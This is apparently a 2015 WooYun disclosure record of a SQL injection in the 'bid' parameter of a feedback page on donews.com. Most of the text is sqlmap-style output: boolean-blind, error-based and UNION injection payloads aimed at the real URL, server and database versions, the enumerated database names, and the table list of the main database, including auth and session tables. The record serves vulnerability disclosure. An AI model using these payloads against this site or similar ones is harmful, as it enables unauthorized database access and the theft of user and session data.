2015-06-04: 细节已通知厂商并且等待厂商处理中 2015-06-09: 厂商已经主动忽略漏洞,细节向公众公开
233
http://www.donews.com/specialqc/tool/feedback.php?bid=1
---Parameter: bid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: bid=1 AND 2040=2040 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: bid=1 AND (SELECT 5418 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(5418=5418,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: Generic UNION query (NULL) - 21 columns Payload: bid=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a7671,0x467a46514f505a475662,0x7176627a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web application technology: PHP 5.3.28back-end DBMS: MySQL 5.0available databases [9]:[*] donews[*] donews_appservice[*] donews_chenfeng[*] donewsblog[*] information_schema[*] mysql[*] niukeji[*] niukeji_bug[*] performance_schemaDatabase: donews[47 tables]+--------------------------------------+| attachments_attachments || attachments_attachments_tags || attachments_category || auth_group || auth_group_permissions || auth_permission || auth_user || auth_user_groups || auth_user_user_permissions || blackboard_blackboard || blacklist || columns_columns || comments_category || comments_comments || config || django_admin_log || django_content_type || django_session || django_site || feedback || ftps_ftps || ftps_ftps_category || imgrepertory || info_profile || logs_logs || news_news || news_news_tags || news_news_uploads || permissions_columnscategory || permissions_columnspermissions || permissions_modulescategory || permissions_modulespermissions || picset || report_report || sections_category || sections_data || sections_sections || sitetemplates_sitetemplates || sitetemplates_sitetemplates_category || special_special || special_special_tags || sph_counter || tags_category || tags_tags || votelog || votesys || workload_workload |+--------------------------------------+
~~~~厂商放弃自己了?
危害等级:无影响厂商忽略
忽略时间:2015-06-09 14:54
漏洞Rank:15 (WooYun评价)
暂无